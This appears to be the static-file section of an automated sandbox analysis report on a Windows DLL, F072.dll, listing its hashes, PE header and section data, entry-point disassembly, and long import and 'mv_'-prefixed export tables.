Preview:	regfZ...Z...p.\..,.................. ....P......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm"..(.................................................................................................................................................................................................................................................................................................................................................V.uHvLE.>......Z....P.......:.$n.y.l.7......................@......hbin................p.\..,..........nk,..X.(.................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..X.(........ ...........P............... .......Z.......................Root........lf......Root....nk ..X.(.....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

Static File Info

General

File type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.665193018402438
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	F072.dll
File size:	983328
MD5:	0f25933ea364d051e10480e68cbf4ae7
SHA1:	bcc95a67d10b389e7c58159911ceac3ba92bef0b
SHA256:	f2e4cbb34cd7431ceb5a186fddd3b38736e5e327afff8dff5d87fe4a6a64048f
SHA512:	067a8089aec626574f3dac7f3b38102671dae4c1121c9b8efa0d38800300275947d9ca73a41233b489672603d4fa099b48785e35e834c907d77d5ee2438d4d22
SSDEEP:	24576:D7AkdHt+UnNtqbVotX4Dw/9JGCZdBK/+NYouXFPn/yd4X:DZ8RDwlJGoY7XX
TLSH:	6D258EC0FBD744FAE46718B1B09AB7AFAB3112050138CE76DFA58E09E976B401DDB245
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....0d...........#...'.....................................................0 .....{.....@... .........................hC.

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x10001390
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6430AE80 [Sat Apr 8 00:00:00 2023 UTC]
TLS Callbacks:	0x10090cc0, 0x10090c70, 0x100a1c60
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ac404a1028e7ce450416867d9b3974cc

Entrypoint Preview

Instruction
sub esp, 0Ch
mov dword ptr [101D86FCh], 00000000h
mov ecx, dword ptr [esp+18h]
mov edx, dword ptr [esp+14h]
mov eax, dword ptr [esp+10h]
call 00007F80B0BFFD97h
add esp, 0Ch
retn 000Ch
lea esi, dword ptr [esi+00000000h]
lea esi, dword ptr [esi+00h]
nop
sub esp, 1Ch
mov eax, dword ptr [esp+20h]
mov dword ptr [esp], 100C9000h
mov dword ptr [esp+04h], eax
call 00007F80B0C9ED2Eh
add esp, 1Ch
ret
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
sub esp, 18h
mov dword ptr [esp], 10001400h
call 00007F80B0BFFF13h
leave
ret
lea esi, dword ptr [esi+00000000h]
lea esi, dword ptr [esi+00h]
nop
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
push edi
push esi
push ebx
mov edx, dword ptr [esp+14h]
mov esi, dword ptr [esp+1Ch]
mov edi, dword ptr [esp+18h]
movzx ebx, dx
shr edx, 10h
test esi, esi
je 00007F80B0BFFFC8h
nop
cmp esi, 04h
jbe 00007F80B0BFFF82h
lea esi, dword ptr [esi+00000000h]
lea esi, dword ptr [esi+00h]
movzx eax, byte ptr [edi]
add edi, 04h
sub esi, 04h
movzx ebp, byte ptr [edi-03h]
movzx ecx, byte ptr [edi-02h]
add eax, ebx
movzx ebx, byte ptr [edi-01h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1da000	0x4368	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1df000	0x1388	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1e3000	0x378	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1e4000	0x4128	.rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc61e4	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1df328	0x2c4	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xab124	0xab200	False	0.4480831126734843	data	6.432110661692397	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xad000	0x100	0x200	False	0.28125	Matlab v4 mat-file (little endian) \377\377\377\377 , text, rows 4294967295, columns 4294967295, imaginary	2.102897197014083	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xae000	0x1a624	0x1a800	False	0.3911224941037736	data	5.329684115990636	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0xc9000	0x110264	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x1da000	0x4368	0x4400	False	0.4040670955882353	data	5.488698281853443	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata	0x1df000	0x1388	0x1400	False	0.3810546875	data	5.386273709762828	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x1e1000	0x30	0x200	False	0.060546875	data	0.25451054171027127	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x1e2000	0x8	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1e3000	0x1a64e	0x1b000	False	0.9544722945601852	data	7.904997942181886	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x1fe000	0x4128	0x4200	False	0.7178030303030303	data	6.590473987933104	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x1e3058	0x31c	data	English	United States

Imports

DLL	Import
bcrypt.dll	BCryptCloseAlgorithmProvider, BCryptGenRandom, BCryptOpenAlgorithmProvider
KERNEL32.dll	AcquireSRWLockExclusive, AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateFileMappingA, CreateMutexA, CreateSemaphoreA, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, FileTimeToSystemTime, FreeLibrary, GetConsoleMode, GetConsoleScreenBufferInfo, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetFullPathNameW, GetHandleInformation, GetLastError, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetProcessAffinityMask, GetProcessTimes, GetStdHandle, GetSystemDirectoryW, GetSystemTimeAdjustment, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetThreadTimes, GetTickCount64, GetTimeZoneInformation, InitOnceBeginInitialize, InitOnceComplete, InitializeConditionVariable, InitializeCriticalSection, InitializeSRWLock, IsDBCSLeadByteEx, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryA, LoadLibraryExA, LoadLibraryExW, MapViewOfFile, MultiByteToWideChar, OpenProcess, OutputDebugStringA, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, ReleaseMutex, ReleaseSRWLockExclusive, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, SetConsoleTextAttribute, SetEvent, SetLastError, SetProcessAffinityMask, SetSystemTime, SetThreadContext, SetThreadPriority, Sleep, SleepConditionVariableSRW, SuspendThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, UnmapViewOfFile, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WaitForSingleObjectEx, WakeAllConditionVariable, WakeConditionVariable, WideCharToMultiByte, WriteConsoleW
msvcrt.dll	__mb_cur_max, __setusermatherr, _aligned_free, _aligned_malloc, _aligned_realloc, _amsg_exit, _beginthreadex, _endthreadex, _errno, _fstat64, _get_osfhandle, _gmtime64, _hypot, _initterm, _iob, _localtime64, _lock, _mktime64, _setjmp3, _sopen, _ultoa, _unlock, _wsopen, abort, acos, asin, atan, atoi, bsearch, calloc, clock, cosh, exit, fprintf, fputc, fputs, free, fwrite, getc, getenv, islower, isspace, isupper, isxdigit, localeconv, log10, malloc, memchr, memcmp, memcpy, memmove, memset, printf, rand, realloc, setlocale, sinh, strchr, strcmp, strcpy, strcspn, strerror, strftime, strlen, strncmp, strrchr, strspn, strstr, strtol, strtoul, tan, tanh, tolower, ungetc, vfprintf, wcscat, wcscpy, wcslen, wcsrchr, longjmp, _strdup, _read, _isatty, _fdopen, _close
USER32.dll	GetDesktopWindow

Exports

Name	Ordinal	Address
mv_add_i	1	0x10023c30
mv_add_q	2	0x10035990
mv_add_stable	3	0x10027e10
mv_adler32_update	4	0x10001410
mv_aes_alloc	5	0x10001bd0
mv_aes_crypt	6	0x10001bf0
mv_aes_ctr_alloc	7	0x100022f0
mv_aes_ctr_crypt	8	0x10002480
mv_aes_ctr_free	9	0x10002420
mv_aes_ctr_get_iv	10	0x10002370
mv_aes_ctr_increment_iv	11	0x10002430
mv_aes_ctr_init	12	0x100023c0
mv_aes_ctr_set_full_iv	13	0x10002340
mv_aes_ctr_set_iv	14	0x10002310
mv_aes_ctr_set_random_iv	15	0x10002380
mv_aes_init	16	0x10001c10
mv_aes_size	17	0x100ae00c
mv_append_path_component	18	0x10006eb0
mv_asprintf	19	0x10006850
mv_assert0_fpu	20	0x1008cfa0
mv_audio_fifo_alloc	21	0x10002670
mv_audio_fifo_drain	22	0x10002af0
mv_audio_fifo_free	23	0x10002610
mv_audio_fifo_peek	24	0x10002900
mv_audio_fifo_peek_at	25	0x10002990
mv_audio_fifo_read	26	0x10002a40
mv_audio_fifo_realloc	27	0x100027b0
mv_audio_fifo_reset	28	0x10002b70
mv_audio_fifo_size	29	0x10002bb0
mv_audio_fifo_space	30	0x10002bc0
mv_audio_fifo_write	31	0x10002850
mv_base64_decode	32	0x100076c0
mv_base64_encode	33	0x100078d0
mv_basename	34	0x10006d70
mv_blowfish_alloc	35	0x10007da0
mv_blowfish_crypt	36	0x100084b0
mv_blowfish_crypt_ecb	37	0x10007dc0
mv_blowfish_init	38	0x100a6ac0
mv_bmg_get	39	0x10024fe0
mv_bprint_append_data	40	0x10008f30
mv_bprint_channel_layout	41	0x1000c9f0
mv_bprint_chars	42	0x10008d20
mv_bprint_clear	43	0x10009670
mv_bprint_escape	44	0x10009730
mv_bprint_finalize	45	0x10009690
mv_bprint_get_buffer	46	0x10009500
mv_bprint_init	47	0x10008880
mv_bprint_init_for_buffer	48	0x100089a0
mv_bprint_strftime	49	0x10009130
mv_bprintf	50	0x100089c0
mv_buffer_alloc	51	0x10009dc0
mv_buffer_allocz	52	0x10009ef0
mv_buffer_create	53	0x10009e60
mv_buffer_default_free	54	0x10009d10
mv_buffer_get_opaque	55	0x1000a090
mv_buffer_get_ref_count	56	0x1000a0a0
mv_buffer_is_writable	57	0x1000a070
mv_buffer_make_writable	58	0x1000a0b0
mv_buffer_pool_buffer_get_opaque	59	0x1000a9b0
mv_buffer_pool_get	60	0x1000a720
mv_buffer_pool_init	61	0x1000a5f0
mv_buffer_pool_init2	62	0x1000a590
mv_buffer_pool_uninit	63	0x1000a650
mv_buffer_realloc	64	0x1000a1d0
mv_buffer_ref	65	0x10009fc0
mv_buffer_replace	66	0x1000a480
mv_buffer_unref	67	0x1000a000
mv_calloc	68	0x100291f0
mv_camellia_alloc	69	0x1000b0b0
mv_camellia_crypt	70	0x1000b0d0
mv_camellia_init	71	0x100a6c8e
mv_camellia_size	72	0x100af650
mv_cast5_alloc	73	0x1000c090
mv_cast5_crypt	74	0x1000c1b0
mv_cast5_crypt2	75	0x1000c0b0
mv_cast5_init	76	0x100a7a6e
mv_cast5_size	77	0x100b1a60
mv_channel_description	78	0x1000c470
mv_channel_description_bprint	79	0x1000c3c0
mv_channel_from_string	80	0x1000c560
mv_channel_layout_channel_from_index	81	0x1000dc10
mv_channel_layout_channel_from_string	82	0x1000eac0
mv_channel_layout_check	83	0x1000ec10
mv_channel_layout_compare	84	0x1000edb0
mv_channel_layout_copy	85	0x1000d340
mv_channel_layout_default	86	0x1000eff0
mv_channel_layout_describe	87	0x1000dba0
mv_channel_layout_describe_bprint	88	0x1000d4d0
mv_channel_layout_extract_channel	89	0x1000d060
mv_channel_layout_from_mask	90	0x1000d1b0
mv_channel_layout_from_string	91	0x1000dd40
mv_channel_layout_index_from_channel	92	0x1000e760
mv_channel_layout_index_from_string	93	0x1000e950
mv_channel_layout_standard	94	0x1000f050
mv_channel_layout_subset	95	0x1000f080
mv_channel_layout_uninit	96	0x1000d270
mv_channel_name	97	0x1000c2d0
mv_channel_name_bprint	98	0x1000c220
mv_chroma_location_enum_to_pos	99	0x10034f30
mv_chroma_location_from_name	100	0x10034ee0
mv_chroma_location_name	101	0x10034ec0
mv_chroma_location_pos_to_enum	102	0x10034f70
mv_cmp_i	103	0x10024200
mv_color_primaries_from_name	104	0x10034d90
mv_color_primaries_name	105	0x10034d70
mv_color_range_from_name	106	0x10034d20
mv_color_range_name	107	0x10034d00
mv_color_space_from_name	108	0x10034e70
mv_color_space_name	109	0x10034e50
mv_color_transfer_from_name	110	0x10034e00
mv_color_transfer_name	111	0x10034de0
mv_compare_mod	112	0x100279f0
mv_compare_ts	113	0x10027830
mv_content_light_metadata_alloc	114	0x10027020
mv_content_light_metadata_create_side_data	115	0x10027050
mv_cpu_count	116	0x1000f8f0
mv_cpu_force_count	117	0x1000f9e0
mv_cpu_max_align	118	0x1000f9f0
mv_crc	119	0x100101d0
mv_crc_get_table	120	0x1000fdb0
mv_crc_init	121	0x1000fbc0
mv_csp_luma_coeffs_from_avcsp	122	0x100102b0
mv_csp_primaries_desc_from_id	123	0x100102f0
mv_csp_primaries_id_from_desc	124	0x10010320
mv_d2q	125	0x10035aa0
mv_d2str	126	0x100068e0
mv_default_get_category	127	0x10026240
mv_default_item_name	128	0x10026230
mv_des_alloc	129	0x10010d80
mv_des_crypt	130	0x10010e40
mv_des_init	131	0x10010da0
mv_des_mac	132	0x10010e90
mv_detection_bbox_alloc	133	0x10010ee0
mv_detection_bbox_create_side_data	134	0x10010f70
mv_dict_copy	135	0x10011d20
mv_dict_count	136	0x10011070
mv_dict_free	137	0x10011cc0
mv_dict_get	138	0x100110d0
mv_dict_get_string	139	0x100121a0
mv_dict_iterate	140	0x10011090
mv_dict_parse_string	141	0x100118c0
mv_dict_set	142	0x10011210
mv_dict_set_int	143	0x10011560
mv_dirname	144	0x10006e10
mv_display_matrix_flip	145	0x100126f0
mv_display_rotation_get	146	0x10012470
mv_display_rotation_set	147	0x100125c0
mv_div_i	148	0x10024ef0
mv_div_q	149	0x10035920
mv_dovi_alloc	150	0x10012780
mv_dovi_metadata_alloc	151	0x100127b0
mv_downmix_info_update_side_data	152	0x10012800
mv_dynamic_hdr_plus_alloc	153	0x1001d0a0
mv_dynamic_hdr_plus_create_side_data	154	0x1001d0d0
mv_dynamic_hdr_vivid_alloc	155	0x1001d130
mv_dynamic_hdr_vivid_create_side_data	156	0x1001d160
mv_dynarray2_add	157	0x100296f0
mv_dynarray_add	158	0x10029620
mv_dynarray_add_nofree	159	0x10029560
mv_encryption_info_add_side_data	160	0x10012f30
mv_encryption_info_alloc	161	0x10012a70
mv_encryption_info_clone	162	0x10012b40
mv_encryption_info_free	163	0x10012cf0
mv_encryption_info_get_side_data	164	0x10012d40
mv_encryption_init_info_add_side_data	165	0x10013860
mv_encryption_init_info_alloc	166	0x10013100
mv_encryption_init_info_free	167	0x100132d0
mv_encryption_init_info_get_side_data	168	0x10013480
mv_escape	169	0x10007050
mv_expr_count_func	170	0x100176e0
mv_expr_count_vars	171	0x10017650
mv_expr_eval	172	0x100177a0
mv_expr_free	173	0x10015280
mv_expr_parse	174	0x10017110
mv_expr_parse_and_eval	175	0x100177f0
mv_fast_malloc	176	0x10029d10
mv_fast_mallocz	177	0x10029df0
mv_fast_realloc	178	0x10029c60
mv_fifo_alloc	179	0x10018a20
mv_fifo_alloc2	180	0x10017e40
mv_fifo_alloc_array	181	0x10018990
mv_fifo_auto_grow_limit	182	0x10017ef0
mv_fifo_can_read	183	0x10017f10
mv_fifo_can_write	184	0x10017f40
mv_fifo_drain	185	0x100192b0
mv_fifo_drain2	186	0x100188c0
mv_fifo_elem_size	187	0x10017f00
mv_fifo_free	188	0x10018aa0
mv_fifo_freep	189	0x10018ae0
mv_fifo_freep2	190	0x10018950
mv_fifo_generic_peek	191	0x10019120
mv_fifo_generic_peek_at	192	0x10018fc0
mv_fifo_generic_read	193	0x10019160
mv_fifo_generic_write	194	0x10018e70
mv_fifo_grow	195	0x10018ce0
mv_fifo_grow2	196	0x10017f70
mv_fifo_peek	197	0x10018760
mv_fifo_peek_to_cb	198	0x100188a0
mv_fifo_read	199	0x10018500
mv_fifo_read_to_cb	200	0x100186c0
mv_fifo_realloc2	201	0x10018b70
mv_fifo_reset	202	0x10018b20
mv_fifo_reset2	203	0x10018930
mv_fifo_size	204	0x10018b40
mv_fifo_space	205	0x10018b50
mv_fifo_write	206	0x100180f0
mv_fifo_write_from_cb	207	0x100182a0
mv_file_map	208	0x100192e0
mv_file_unmap	209	0x10019570
mv_film_grain_params_alloc	210	0x10019b60
mv_film_grain_params_create_side_data	211	0x10019b90
mv_find_best_pix_fmt_of_2	212	0x10034a40
mv_find_info_tag	213	0x10032410
mv_find_nearest_q_idx	214	0x10035e60
mv_fopen_utf8	215	0x10019b50
mv_force_cpu_flags	216	0x1000f820
mv_fourcc_make_string	217	0x1008ced0
mv_frame_alloc	218	0x1001ac40
mv_frame_apply_cropping	219	0x1001c490
mv_frame_clone	220	0x1001c050
mv_frame_copy	221	0x1001b8d0
mv_frame_copy_props	222	0x1001b550
mv_frame_free	223	0x1001adb0
mv_frame_get_buffer	224	0x1001adf0
mv_frame_get_plane_buffer	225	0x1001b570
mv_frame_get_side_data	226	0x1001b890
mv_frame_is_writable	227	0x1001b4b0
mv_frame_make_writable	228	0x1001c210
mv_frame_move_ref	229	0x1001b320
mv_frame_new_side_data	230	0x1001b7e0
mv_frame_new_side_data_from_buf	231	0x1001b750
mv_frame_ref	232	0x1001bc40
mv_frame_remove_side_data	233	0x1001c3e0
mv_frame_side_data_name	234	0x1001c470
mv_frame_unref	235	0x1001b300
mv_free	236	0x100290d0
mv_freep	237	0x100290e0
mv_gcd	238	0x10027090
mv_gcd_q	239	0x100362f0
mv_get_alt_sample_fmt	240	0x1003c9f0
mv_get_bits_per_pixel	241	0x100345a0
mv_get_bytes_per_sample	242	0x1003cb50
mv_get_channel_description	243	0x1000cf80
mv_get_channel_layout	244	0x1000c640
mv_get_channel_layout_channel_index	245	0x1000cd50
mv_get_channel_layout_nb_channels	246	0x1000cc80
mv_get_channel_layout_string	247	0x1000cbf0
mv_get_channel_name	248	0x1000cea0
mv_get_colorspace_name	249	0x1001ac20
mv_get_cpu_flags	250	0x1000f880
mv_get_default_channel_layout	251	0x1000cd10
mv_get_extended_channel_layout	252	0x1000c8f0
mv_get_known_color_name	253	0x10031760
mv_get_media_type_string	254	0x1008cd60
mv_get_packed_sample_fmt	255	0x1003ca30
mv_get_padded_bits_per_pixel	256	0x100345f0
mv_get_picture_type_char	257	0x1008cd80
mv_get_pix_fmt	258	0x10034480
mv_get_pix_fmt_loss	259	0x10034a10
mv_get_pix_fmt_name	260	0x10034450
mv_get_pix_fmt_string	261	0x100346a0
mv_get_planar_sample_fmt	262	0x1003ca70
mv_get_random_seed	263	0x10035030
mv_get_sample_fmt	264	0x1003c860
mv_get_sample_fmt_name	265	0x1003c840
mv_get_sample_fmt_string	266	0x1003caa0
mv_get_standard_channel_layout	267	0x1000d150
mv_get_time_base_q	268	0x1008cf90
mv_get_token	269	0x10006940
mv_gettime	270	0x1004dbb0
mv_gettime_relative	271	0x1004dbf0
mv_gettime_relative_is_monotonic	272	0x1004dc60
mv_hash_alloc	273	0x1001c790
mv_hash_final	274	0x1001cb30
mv_hash_final_b64	275	0x1001ce80
mv_hash_final_bin	276	0x1001cbc0
mv_hash_final_hex	277	0x1001ce00
mv_hash_freep	278	0x1001d070
mv_hash_get_name	279	0x1001c770
mv_hash_get_size	280	0x1001c780
mv_hash_init	281	0x1001c870
mv_hash_names	282	0x1001c750
mv_hash_update	283	0x1001ca10
mv_hmac_alloc	284	0x1001d220
mv_hmac_calc	285	0x1001d720
mv_hmac_final	286	0x1001d5a0
mv_hmac_free	287	0x1001d3a0
mv_hmac_init	288	0x1001d3e0
mv_hmac_update	289	0x1001d590
mv_hwdevice_ctx_alloc	290	0x1001d9d0
mv_hwdevice_ctx_create	291	0x1001e0b0
mv_hwdevice_ctx_create_derived	292	0x1001e320
mv_hwdevice_ctx_create_derived_opts	293	0x1001e190
mv_hwdevice_ctx_init	294	0x1001db30
mv_hwdevice_find_type_by_name	295	0x1001d920
mv_hwdevice_get_hwframe_constraints	296	0x1001dfd0
mv_hwdevice_get_type_name	297	0x1001d970
mv_hwdevice_hwconfig_alloc	298	0x1001dfa0
mv_hwdevice_iterate_types	299	0x1001d990
mv_hwframe_constraints_free	300	0x1001e070
mv_hwframe_ctx_alloc	301	0x1008d450
mv_hwframe_ctx_create_derived	302	0x1001ea30
mv_hwframe_ctx_init	303	0x1001e7f0
mv_hwframe_get_buffer	304	0x1001e690
mv_hwframe_map	305	0x1001e450
mv_hwframe_transfer_data	306	0x1001dd70
mv_hwframe_transfer_get_formats	307	0x1001dd40
mv_i2int	308	0x10024fb0
mv_image_alloc	309	0x10021d20
mv_image_check_sar	310	0x100222b0
mv_image_check_size	311	0x100221c0
mv_image_check_size2	312	0x10022070
mv_image_copy	313	0x10022610
mv_image_copy_plane	314	0x100224f0
mv_image_copy_plane_uc_from	315	0x10022390
mv_image_copy_to_buffer	316	0x10023350
mv_image_copy_uc_from	317	0x10022af0
mv_image_fill_arrays	318	0x10022fe0
mv_image_fill_black	319	0x10023620
mv_image_fill_linesizes	320	0x100215d0
mv_image_fill_max_pixsteps	321	0x10021380
mv_image_fill_plane_sizes	322	0x100219b0
mv_image_fill_pointers	323	0x10021af0
mv_image_get_buffer_size	324	0x10023180
mv_image_get_linesize	325	0x10021480
mv_int2i	326	0x10024f80
mv_int_list_length_for_size	327	0x1008cda0
mv_lfg_init	328	0x100a7ee0
mv_lfg_init_from_data	329	0x10025100
mv_log	330	0x10026560
mv_log2	331	0x10024fc0
mv_log2_16bit	332	0x10024fd0
mv_log2_i	333	0x10023dd0
mv_log_default_callback	334	0x10025b10
mv_log_format_line	335	0x10026550
mv_log_format_line2	336	0x10026250
mv_log_get_flags	337	0x10026710
mv_log_get_level	338	0x100266e0
mv_log_once	339	0x100265d0
mv_log_set_callback	340	0x10026720
mv_log_set_flags	341	0x10026700
mv_log_set_level	342	0x100266f0
mv_lzo1x_decode	343	0x10026870
mv_malloc	344	0x10028d50
mv_malloc_array	345	0x10028ec0
mv_mallocz	346	0x10029100
mv_mallocz_array	347	0x10028f20
mv_mastering_display_metadata_alloc	348	0x10026f40
mv_mastering_display_metadata_create_side_data	349	0x10026f60
mv_match_list	350	0x100075a0
mv_match_name	351	0x10007100
mv_max_alloc	352	0x10028d40
mv_md5_alloc	353	0x10028790
mv_md5_final	354	0x100289f0
mv_md5_init	355	0x100287b0
mv_md5_size	356	0x100b7208
mv_md5_sum	357	0x10028b00
mv_md5_update	358	0x100287e0
mv_memcpy_backptr	359	0x10029830
mv_memdup	360	0x100294a0
mv_mod_i	361	0x100243c0
mv_mul_i	362	0x10023e60
mv_mul_q	363	0x100358c0
mv_murmur3_alloc	364	0x10029fc0
mv_murmur3_final	365	0x1002a800
mv_murmur3_init	366	0x1002a0d0
mv_murmur3_init_seeded	367	0x10029fe0
mv_murmur3_update	368	0x1002a1b0
mv_nearer_q	369	0x10035ca0
mv_opt_child_class_iterate	370	0x100303a0
mv_opt_child_next	371	0x10030380
mv_opt_copy	372	0x10030430
mv_opt_eval_double	373	0x1002f620
mv_opt_eval_flags	374	0x1002f520
mv_opt_eval_float	375	0x1002f5e0
mv_opt_eval_int	376	0x1002f560
mv_opt_eval_int64	377	0x1002f5a0
mv_opt_eval_q	378	0x1002f660
mv_opt_find	379	0x1002ee70
mv_opt_find2	380	0x1002ec60
mv_opt_flag_is_set	381	0x100302d0
mv_opt_free	382	0x1002ebd0
mv_opt_freep_ranges	383	0x10030760
mv_opt_get	384	0x1002d870
mv_opt_get_channel_layout	385	0x1002e4c0
mv_opt_get_chlayout	386	0x1002e550
mv_opt_get_dict_val	387	0x1002e5e0
mv_opt_get_double	388	0x1002df00
mv_opt_get_image_size	389	0x1002e1a0
mv_opt_get_int	390	0x1002dd90
mv_opt_get_key_value	391	0x1002ea50
mv_opt_get_pixel_fmt	392	0x1002e3c0
mv_opt_get_q	393	0x1002e010
mv_opt_get_sample_fmt	394	0x1002e440
mv_opt_get_video_rate	395	0x1002e230
mv_opt_is_set_to_default	396	0x10030800
mv_opt_is_set_to_default_by_name	397	0x10030d80
mv_opt_next	398	0x1002c760
mv_opt_ptr	399	0x100303c0
mv_opt_query_ranges	400	0x10030700
mv_opt_query_ranges_default	401	0x1002b9f0
mv_opt_serialize	402	0x10030dd0
mv_opt_set	403	0x1002f6a0
mv_opt_set_bin	404	0x1002cfc0
mv_opt_set_channel_layout	405	0x1002d730
mv_opt_set_chlayout	406	0x1002d820
mv_opt_set_defaults	407	0x1002ea30
mv_opt_set_defaults2	408	0x1002e6b0
mv_opt_set_dict	409	0x100302a0
mv_opt_set_dict2	410	0x10030180
mv_opt_set_dict_val	411	0x1002d7b0
mv_opt_set_double	412	0x1002c9d0
mv_opt_set_from_string	413	0x1002ff20
mv_opt_set_image_size	414	0x1002d120
mv_opt_set_int	415	0x1002c7b0
mv_opt_set_pixel_fmt	416	0x1002d510
mv_opt_set_q	417	0x1002ccc0
mv_opt_set_sample_fmt	418	0x1002d620
mv_opt_set_video_rate	419	0x1002d1e0
mv_opt_show2	420	0x1002e640
mv_parse_color	421	0x10031420
mv_parse_cpu_caps	422	0x1000f8b0
mv_parse_ratio	423	0x100310f0
mv_parse_time	424	0x10031c30
mv_parse_video_rate	425	0x100312c0
mv_parse_video_size	426	0x10031200
mv_pix_fmt_count_planes	427	0x10034870
mv_pix_fmt_desc_get	428	0x10034790
mv_pix_fmt_desc_get_id	429	0x10034800
mv_pix_fmt_desc_next	430	0x100347c0
mv_pix_fmt_get_chroma_sub_sample	431	0x10034830
mv_pix_fmt_swap_endianness	432	0x10034920
mv_pixelutils_get_sad_fn	433	0x10035000
mv_q2intfloat	434	0x10036090
mv_rc4_alloc	435	0x100363e0
mv_rc4_crypt	436	0x100364e0
mv_rc4_init	437	0x10036400
mv_read_image_line	438	0x100339c0
mv_read_image_line2	439	0x10033270
mv_realloc	440	0x10028da0
mv_realloc_array	441	0x10029010
mv_realloc_f	442	0x10028de0
mv_reallocp	443	0x10028e40
mv_reallocp_array	444	0x10029050
mv_reduce	445	0x100353b0
mv_rescale	446	0x10027760
mv_rescale_delta	447	0x10027a80
mv_rescale_q	448	0x100277e0
mv_rescale_q_rnd	449	0x100277b0
mv_rescale_rnd	450	0x10027220
mv_ripemd_alloc	451	0x1003c470
mv_ripemd_final	452	0x1003c6e0
mv_ripemd_init	453	0x100a7f8c
mv_ripemd_size	454	0x100bf9a4
mv_ripemd_update	455	0x1003c490
mv_sample_fmt_is_planar	456	0x1003cb70
mv_samples_alloc	457	0x1003ce40
mv_samples_alloc_array_and_samples	458	0x1003d010
mv_samples_copy	459	0x1003d270
mv_samples_fill_arrays	460	0x1003ccd0
mv_samples_get_buffer_size	461	0x1003cb90
mv_samples_set_silence	462	0x1003d450
mv_set_options_string	463	0x1002fd50
mv_sha512_alloc	464	0x1004c260
mv_sha512_final	465	0x1004c4c0
mv_sha512_init	466	0x100a81b0
mv_sha512_size	467	0x100bfaec
mv_sha512_update	468	0x1004c280
mv_sha_alloc	469	0x100411a0
mv_sha_final	470	0x10041410
mv_sha_init	471	0x100a80b4
mv_sha_size	472	0x100bfae4
